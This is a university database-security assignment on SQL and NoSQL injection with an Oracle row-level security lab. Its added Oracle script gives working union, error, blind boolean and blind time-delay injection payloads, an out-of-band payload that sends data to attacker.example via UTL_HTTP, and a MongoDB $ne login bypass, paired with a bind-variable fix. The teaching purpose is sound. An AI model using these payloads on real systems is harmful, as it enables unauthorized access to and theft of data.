
Week 7 Written Assignment: SQL & NoSQL Injections

Injection attacks give an attacker a wide range of options. They can be used to bypass
authentication and to read, modify and delete data within a database. Because many database
servers can run operating-system commands (through stored procedures or built-in packages), the
same method can be used to execute commands on the host, which enables attacks inside a network
that sits behind a firewall.

SQL injection targets traditional relational database systems by inserting unauthorized or
malicious statements through the input fields of web applications. NoSQL injection targets
non-relational and Big Data platforms by inserting malicious statements into their query
interfaces or components (e.g., Hive or MapReduce). Either kind of input injection can give an
attacker unrestricted access to an entire database. Query-level access control detects
unauthorized queries injected via web applications and/or stored procedures.
You are required to complete BOTH Part A and Part B of the assignment.

Part A

You should look at the attack types, categories, techniques and the attacker's desired results.
Please write short essay answers discussing the following questions:

1. Describe the In-band SQL injection (SQLi) attack method. Include details on the
Error-based SQLi and Union-based SQLi types. Expand on how the information gained is
helpful to the attacker.
2. Describe the Inferential SQLi (Blind SQLi) attack method. Include details on the
Blind boolean-based SQLi and Blind time-based SQLi types. Why are these called blind
SQL injection attacks? Expand on how the information gained is helpful to the attacker.
Why would an attacker use these methods?
3. Describe the Out-of-band SQLi attack method. Expand on how the information
gained is helpful to the attacker. Why is this technique less common?
4. How does the NoSQL injection attack differ from the traditional SQL injection?
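The Oracle SQL script below is an added example, not part of the assignment or its supplemental
material, that makes the four attack classes in the questions above concrete in the same
database family used in Part B. It assumes a hypothetical table APP_USERS(USERNAME,
PASSWORD_HASH, ROLE), an application that builds its login query by string concatenation, a known
valid username "alice", and an attacker-controlled host attacker.example; all of these are
assumptions. Each payload is shown first as the text typed into the username field and then as
the statement the database actually receives. USER is used as the value to extract only for
brevity; any scalar subquery (a password hash, a banner from V$VERSION) can take its place.

```sql
-- Added example (not from the assignment). Hypothetical schema:
--   CREATE TABLE app_users (username VARCHAR2(30), password_hash VARCHAR2(64), role VARCHAR2(20));
-- The vulnerable application builds this statement by concatenation:
--   SELECT username, role FROM app_users WHERE username = '<input>'

-- 1a. In-band, union-based: the attacker's data rides in the normal result set.
--     Oracle requires the same number of columns with compatible types.
--     Input:  x' UNION SELECT table_name, owner FROM all_tables--
SELECT username, role FROM app_users
 WHERE username = 'x' UNION SELECT table_name, owner FROM all_tables--';

-- 1b. In-band, error-based: the data rides in the error text. XMLType's parser
--     rejects the element name "<:" || USER || ">" and echoes it back inside
--     ORA-31011 / LPX-00110 "invalid QName", so the value is read from the error.
--     Input:  x' AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||USER||CHR(62))) FROM dual)--
SELECT username, role FROM app_users
 WHERE username = 'x' AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||USER||CHR(62))) FROM dual)--';

-- 2a. Inferential (blind), boolean-based: nothing is echoed; the attacker learns
--     one bit per request from whether the known user's row comes back.
--     Input:  alice' AND SUBSTR(USER,1,1)='D'--
SELECT username, role FROM app_users
 WHERE username = 'alice' AND SUBSTR(USER,1,1)='D'--';

-- 2b. Inferential (blind), time-based: the bit is carried by response time.
--     DBMS_PIPE.RECEIVE_MESSAGE returns 1 after its 5 s timeout, so the row
--     comes back either way and only the delay reveals the answer.
--     Input:  alice' AND (CASE WHEN SUBSTR(USER,1,1)='D'
--                        THEN DBMS_PIPE.RECEIVE_MESSAGE('x',5) ELSE 1 END)=1--
SELECT username, role FROM app_users
 WHERE username = 'alice' AND (CASE WHEN SUBSTR(USER,1,1)='D'
                                    THEN DBMS_PIPE.RECEIVE_MESSAGE('x',5) ELSE 1 END)=1--';

-- 3. Out-of-band: the data leaves over a channel the attacker controls (an HTTP
--    request here; DNS via UTL_INADDR works the same way). Since Oracle 11g the
--    application user needs a network ACL for this to succeed, which is one
--    reason the technique is seen less often than the in-band and blind ones.
--    Input:  alice' AND (SELECT UTL_HTTP.REQUEST('http://attacker.example/'||USER) FROM dual) IS NOT NULL--
SELECT username, role FROM app_users
 WHERE username = 'alice' AND (SELECT UTL_HTTP.REQUEST('http://attacker.example/'||USER) FROM dual) IS NOT NULL--';

-- 4. NoSQL comparison (MongoDB-style, shown as a comment because it is not SQL):
--    the attacker injects query operators into a JSON document rather than SQL
--    syntax. A login body of
--      {"username": "alice", "password": {"$ne": ""}}
--    matches alice for any password. There are no bind variables to reach for;
--    the fix is to reject non-string values before the query is built.

-- Hardened form for the SQL cases: the input is bound, never parsed as SQL.
CREATE OR REPLACE FUNCTION get_role (p_user IN VARCHAR2) RETURN VARCHAR2 AS
  v_role app_users.role%TYPE;
BEGIN
  -- Vulnerable version, kept only for contrast:
  --   EXECUTE IMMEDIATE 'SELECT role FROM app_users WHERE username = '''
  --                     || p_user || '''' INTO v_role;
  EXECUTE IMMEDIATE 'SELECT role FROM app_users WHERE username = :u'
    INTO v_role USING p_user;
  RETURN v_role;
EXCEPTION
  WHEN NO_DATA_FOUND THEN RETURN NULL;  -- every payload above is just an unknown username
END;
/
```

Run the payload statements as a user that owns the hypothetical APP_USERS table to see each
channel (result set, error text, row/no row, delay, outbound request) in turn; the hardened
GET_ROLE returns NULL for all of them because the bound value is compared as data.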

Part B

Lab Virtual Private Database (VPD) by Context

In this lab, you will implement a VPD case. It is a good idea to refer to the supplemental
materials. Please follow the specifications below.
Your tasks are as follows:

1. Connect to user SYSTEM. When you need to connect to the SYSTEM schema, please use a
syntax that prompts for the password rather than placing it in the script. A typical
example is: "connect system;"

2. Grant the "DBA" role to user DBSEC. This is the same user created in a previous lab.
If for some reason the user was dropped, you need to recreate the user before proceeding.

3. Grant the "CREATE SESSION" and "CREATE TABLE" privileges to user VPD_CLERK1.

4. Connect to user DBSEC/IS481%sec. Please note that the password is from our previous
lab. If for some reason the user was dropped or changed, you need to change it back to the
above user name and password.

5. Create the "CUSTOMER" table with the following columns. Please note the slight changes
in the table from the previous project.

Column Name      Data Type
SALES_REP_ID     NUMBER(4)
CUSTOMER_ID      NUMBER(8) NOT NULL
CUSTOMER_SSN     VARCHAR2(9)
FIRST_NAME       VARCHAR2(20)
LAST_NAME        VARCHAR2(20)
ADDR_LINE        VARCHAR2(80)
CITY             VARCHAR2(30)
STATE            VARCHAR2(30)
ZIP_CODE         VARCHAR2(9)
PHONE            VARCHAR2(15)
EMAIL            VARCHAR2(80)
CC_NUMBER        VARCHAR2(20)
CREDIT_LIMIT     NUMBER
GENDER           CHAR(1)
STATUS           CHAR(1)
COMMENTS         VARCHAR2(1024)
CTL_UPD_DTTM     DATE
CTL_UPD_USER     VARCHAR2(30)
CTL_REC_STAT     CHAR(1)

6. Populate the CUSTOMER table using the data in the file provided. Click here to
download the data file. (If your web browser is set to auto mode, you may have to
right-click the word "here" and select "Save Link Target As" in order to download the
script file.)

You may either put all the "insert" statements in this file or provide a link to another
file. If you use a link, please make sure it works on your computer.

7. Query the "CUSTOMER" table to show the total number of rows from each user (i.e.,
grouped by CTL_UPD_USER).

8. Grant the SELECT, DELETE, INSERT and UPDATE privileges on the CUSTOMER table to user
VPD_CLERK1.

9. Create a policy function named "DBSEC_ROW_OWNER_FUNCTION" so that only the data that
belongs to the current user will be selected. In other words, the function must generate
the predicate "CTL_UPD_USER=USER". You may refer to this week's supplemental material for
sample code. Please note that the owner of the table (DBSEC) has to be able to access its
own table, so the predicate must not lock DBSEC out. (20 points) (Please note that the
double quotation marks (") are not part of the specification.)

10. Add the policy using the DBMS_RLS.ADD_POLICY procedure. The policy will be named
"MY_OWNER_POLICY".

11. Connect to VPD_CLERK1/Nancy#481.

12. Query the "CUSTOMER" table (as DBSEC.CUSTOMER, since VPD_CLERK1 does not own it) to
show the total number of rows from each user. If everything is successful, you will see only
one row: the policy restricts VPD_CLERK1 to the rows whose CTL_UPD_USER is VPD_CLERK1, so only
that user's group remains.

Tip:

Make sure that you are connected as user DBSEC/IS481%sec before creating the policy function
and running DBMS_RLS.ADD_POLICY. Otherwise the function is created in (or looked up in) the
wrong schema and you will see ORA-28110 (policy function or package has error) when the
policy is applied.
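The SQL*Plus script below is an added example that walks through steps 1 to 12 end to end; it is
not the supplemental sample code and not the instructor's data file. It assumes that user
VPD_CLERK1 already exists from the earlier lab, that the script is run in SQL*Plus (so
"CONNECT system" prompts for the password), and that the three CUSTOMER rows are constructed
stand-ins for the provided data file. The policy function returns an empty predicate for DBSEC
so the owner keeps full access, and "CTL_UPD_USER = USER" for everyone else; the column names,
user names and passwords are the ones the lab specifies.

```sql
-- Added example (not the lab's supplemental code). Run in SQL*Plus.
SET ECHO ON

-- Steps 1-3: as SYSTEM (password is prompted for, not stored in the script).
CONNECT system
GRANT DBA TO dbsec;
GRANT CREATE SESSION, CREATE TABLE TO vpd_clerk1;

-- Step 4: everything from here on runs as the table owner.
CONNECT dbsec/IS481%sec

-- Step 5: the CUSTOMER table exactly as specified.
CREATE TABLE customer (
  sales_rep_id  NUMBER(4),
  customer_id   NUMBER(8) NOT NULL,
  customer_ssn  VARCHAR2(9),
  first_name    VARCHAR2(20),
  last_name     VARCHAR2(20),
  addr_line     VARCHAR2(80),
  city          VARCHAR2(30),
  state         VARCHAR2(30),
  zip_code      VARCHAR2(9),
  phone         VARCHAR2(15),
  email         VARCHAR2(80),
  cc_number     VARCHAR2(20),
  credit_limit  NUMBER,
  gender        CHAR(1),
  status        CHAR(1),
  comments      VARCHAR2(1024),
  ctl_upd_dttm  DATE,
  ctl_upd_user  VARCHAR2(30),
  ctl_rec_stat  CHAR(1)
);

-- Step 6: constructed sample rows (the real lab loads the provided data file).
-- Two rows are owned by DBSEC and one by VPD_CLERK1.
INSERT INTO customer (customer_id, first_name, last_name, ctl_upd_dttm, ctl_upd_user, ctl_rec_stat)
  VALUES (1001, 'Ann',  'Lee',  SYSDATE, 'DBSEC',      'A');
INSERT INTO customer (customer_id, first_name, last_name, ctl_upd_dttm, ctl_upd_user, ctl_rec_stat)
  VALUES (1002, 'Bob',  'Ray',  SYSDATE, 'DBSEC',      'A');
INSERT INTO customer (customer_id, first_name, last_name, ctl_upd_dttm, ctl_upd_user, ctl_rec_stat)
  VALUES (1003, 'Cara', 'Diaz', SYSDATE, 'VPD_CLERK1', 'A');
COMMIT;

-- Step 7: row count per owner. No policy yet, so DBSEC sees both groups.
SELECT ctl_upd_user, COUNT(*) AS total_rows FROM customer GROUP BY ctl_upd_user;

-- Step 8: object privileges for the clerk.
GRANT SELECT, INSERT, UPDATE, DELETE ON customer TO vpd_clerk1;

-- Step 9: the policy function. VPD requires the (schema, object) parameters
-- even when they are unused. USER is the session user at query time, so the
-- returned text becomes the WHERE predicate for whoever runs the statement.
CREATE OR REPLACE FUNCTION dbsec_row_owner_function (
  p_schema IN VARCHAR2,
  p_object IN VARCHAR2)
RETURN VARCHAR2
AS
BEGIN
  IF USER = 'DBSEC' THEN
    RETURN NULL;                     -- empty predicate: the owner is unrestricted
  ELSE
    RETURN 'CTL_UPD_USER = USER';    -- everyone else sees only their own rows
  END IF;
END;
/

-- Step 10: attach the policy. ADD_POLICY is a procedure, so it is called from a
-- PL/SQL block. update_check => TRUE also stops a clerk from inserting or updating
-- a row whose CTL_UPD_USER is somebody else (the row would vanish from their view).
BEGIN
  DBMS_RLS.ADD_POLICY(
    object_schema   => 'DBSEC',
    object_name     => 'CUSTOMER',
    policy_name     => 'MY_OWNER_POLICY',
    function_schema => 'DBSEC',
    policy_function => 'DBSEC_ROW_OWNER_FUNCTION',
    statement_types => 'SELECT,INSERT,UPDATE,DELETE',
    update_check    => TRUE);
END;
/

-- Steps 11-12: the clerk's grouped query returns a single row (VPD_CLERK1, 1)
-- because the predicate removes the DBSEC-owned rows before grouping.
CONNECT vpd_clerk1/Nancy#481
SELECT ctl_upd_user, COUNT(*) AS total_rows FROM dbsec.customer GROUP BY ctl_upd_user;
```

A quick check that the policy is in place and enabled can be run as DBSEC with
SELECT policy_name, function, enable FROM user_policies WHERE object_name = 'CUSTOMER'; if the
function was created while connected as SYSTEM instead, this is where the ORA-28110 from the tip
above originates, because ADD_POLICY was told to look for it in DBSEC.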

Submission Requirement:

The SQL script files and screen captures of the completed lab steps are required.

Grading Rubric

Criteria: In-band SQLi (10 points possible)
  Excellent (10-9 points): Meets the Competent criteria and is substantiated with examples of the in-band technique and categories.
  Competent (8-4 points): Provides an explanation with examples of the in-band technique and categories.
  Needs Improvement (3-0 points): Insufficiently provides an explanation or examples of the in-band technique and categories.

Criteria: Inferential SQLi (10 points possible)
  Excellent (10-9 points): Meets the Competent criteria and is substantiated with examples of the Inferential SQLi technique and categories.
  Competent (8-4 points): Provides an explanation with examples of the Inferential SQLi technique and categories.
  Needs Improvement (3-0 points): Insufficiently provides an explanation or examples of the Inferential SQLi technique and categories.

Criteria: Out-of-band SQLi (10 points possible)
  Excellent (10-9 points): Meets the Competent criteria and is substantiated with examples of the Out-of-band SQLi technique and categories.
  Competent (8-4 points): Provides an explanation with examples of the Out-of-band SQLi technique and categories.
  Needs Improvement (3-0 points): Insufficiently provides an explanation or examples of the Out-of-band SQLi technique and categories.

Criteria: NoSQLi vs SQLi (10 points possible)
  Excellent (10-9 points): Meets the Competent criteria and is substantiated with examples in the comparison of NoSQLi vs SQLi techniques.
  Competent (8-4 points): Provides a comparison of the NoSQLi vs SQLi techniques.
  Needs Improvement (3-0 points): Insufficiently provides a comparison of the NoSQLi vs SQLi techniques.

Criteria: Lab Creation of Table and Population (30 points possible)
  Excellent (30-27 points): Submission includes both the script file and screen capture of the creation of the tables and population.
  Competent (26-15 points): Submission includes both the script file and screen captures of the creation of the tables and population but contains errors.
  Needs Improvement (15-0 points): Submission does not include both the script file and screen capture of the creation of the tables and population, or contains errors.

Criteria: Lab Add Policy and Test (30 points possible)
  Excellent (30-27 points): Submission includes both the script file and screen capture of the add policy and test.
  Competent (26-15 points): Submission includes both the script file and screen capture of the add policy and test but has errors.
  Needs Improvement (15-0 points): Submission does not include both the script file and screen captures of the add policy and test, or contains errors.

Total Points Possible: 100
